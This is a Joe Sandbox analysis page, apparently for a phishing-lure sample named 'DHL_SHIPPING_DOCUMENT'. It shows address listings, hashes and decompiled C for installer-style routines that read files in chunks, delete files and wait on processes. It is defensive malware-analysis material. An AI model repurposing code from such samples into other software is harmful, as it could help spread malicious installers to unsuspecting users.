                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040744d
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074eb
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x0040751d
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004073ce
                                                              0x004073cb

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                              • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                              • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                              • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40f0ca
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                                              0x00403489
                                                              0x0040349c
                                                              0x004034a1
                                                              0x004035d1
                                                              0x004035d3
                                                              0x00000000
                                                              0x004035d9
                                                              0x004034ad
                                                              0x004034c0
                                                              0x004034c6
                                                              0x004034cc
                                                              0x004034d7
                                                              0x004034dc
                                                              0x004034e1
                                                              0x004034e9
                                                              0x004034eb
                                                              0x004034eb
                                                              0x004034f4
                                                              0x004034fb
                                                              0x00000000
                                                              0x00000000
                                                              0x00403501
                                                              0x00403507
                                                              0x0040350d
                                                              0x00000000
                                                              0x00403513
                                                              0x00403519
                                                              0x00403539
                                                              0x0040353e
                                                              0x00403543
                                                              0x00403549
                                                              0x0040354f
                                                              0x00403559
                                                              0x00403560
                                                              0x00000000
                                                              0x00000000
                                                              0x00403562
                                                              0x00403568
                                                              0x0040356a
                                                              0x0040358d
                                                              0x00403593
                                                              0x00000000
                                                              0x00000000
                                                              0x00403595
                                                              0x00403597
                                                              0x00000000
                                                              0x00000000
                                                              0x00403599
                                                              0x00403599
                                                              0x004035ac
                                                              0x00000000
                                                              0x00000000
                                                              0x004035bb
                                                              0x00000000
                                                              0x004035bb
                                                              0x00403574
                                                              0x0040357b
                                                              0x004035c8
                                                              0x004035ce
                                                              0x004035ce
                                                              0x00000000
                                                              0x004035ce
                                                              0x0040357d
                                                              0x00403583
                                                              0x00403589
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004035cc
                                                              0x004035cc
                                                              0x00000000
                                                              0x004035cc
                                                              0x00000000

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 0040348D
                                                                • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: FilePointer$CountTick
                                                              • String ID:
                                                              • API String ID: 1092082344-0
                                                              • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                              • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                              • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                              • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 41%
                                                              			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                              0x00405d2d
                                                              0x00405d38
                                                              0x00405d3d
                                                              0x00405d6d
                                                              0x00000000
                                                              0x00405d6d
                                                              0x00405d44
                                                              0x00405d45
                                                              0x00405d4f
                                                              0x00405d47
                                                              0x00405d47
                                                              0x00405d47
                                                              0x00405d57
                                                              0x00405d63
                                                              0x00405d67
                                                              0x00405d67
                                                              0x00000000
                                                              0x00405d59
                                                              0x00000000
                                                              0x00405d5b

                                                              APIs
                                                                • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                              • String ID:
                                                              • API String ID: 1655745494-0
                                                              • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                              • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                              • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                              • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                              0x00406af1
                                                              0x00406b08
                                                              0x00406afc
                                                              0x00406b06
                                                              0x00406b06
                                                              0x00406b13
                                                              0x00406b1f

                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                              • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: ObjectSingleWait$CodeExitProcess
                                                              • String ID:
                                                              • API String ID: 2567322000-0
                                                              • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                              • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                              • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                              • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 92%
                                                              			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                              0x00403375
                                                              0x0040337e
                                                              0x00403387
                                                              0x0040338b
                                                              0x00403396
                                                              0x00403396
                                                              0x0040339e
                                                              0x004033a5
                                                              0x004033b7
                                                              0x004033be
                                                              0x00403463
                                                              0x00403463
                                                              0x00000000
                                                              0x004033c4
                                                              0x004033c7
                                                              0x004033d3
                                                              0x004033d7
                                                              0x00403471
                                                              0x00403471
                                                              0x004033dd
                                                              0x004033e0
                                                              0x0040343f
                                                              0x00403445
                                                              0x00403447
                                                              0x00403447
                                                              0x00403459
                                                              0x00403461
                                                              0x00403468
                                                              0x0040346b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004033e2
                                                              0x004033e5
                                                              0x00000000
                                                              0x004033eb
                                                              0x004033f0
                                                              0x004033f7
                                                              0x004033fa
                                                              0x004033fc
                                                              0x004033fc
                                                              0x00403409
                                                              0x0040340c
                                                              0x00403413
                                                              0x00000000
                                                              0x00000000
                                                              0x0040341c
                                                              0x00403423
                                                              0x0040343b
                                                              0x00403465
                                                              0x00403465
                                                              0x00403425
                                                              0x00403425
                                                              0x00403428
                                                              0x0040342b
                                                              0x00403431
                                                              0x00403437
                                                              0x00000000
                                                              0x00403439
                                                              0x00000000
                                                              0x00403439
                                                              0x00403437
                                                              0x00000000
                                                              0x00403423
                                                              0x00000000
                                                              0x004033f0
                                                              0x004033e5
                                                              0x004033e0
                                                              0x004033d7
                                                              0x004033be
                                                              0x00403473
                                                              0x00403476

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                              • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                              • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                              • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 69%
                                                              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                              0x0040138a
                                                              0x004013fa
                                                              0x0040139b
                                                              0x004013a0
                                                              0x00000000
                                                              0x00000000
                                                              0x004013a2
                                                              0x004013a3
                                                              0x004013ad
                                                              0x00000000
                                                              0x00401404
                                                              0x004013b0
                                                              0x004013b7
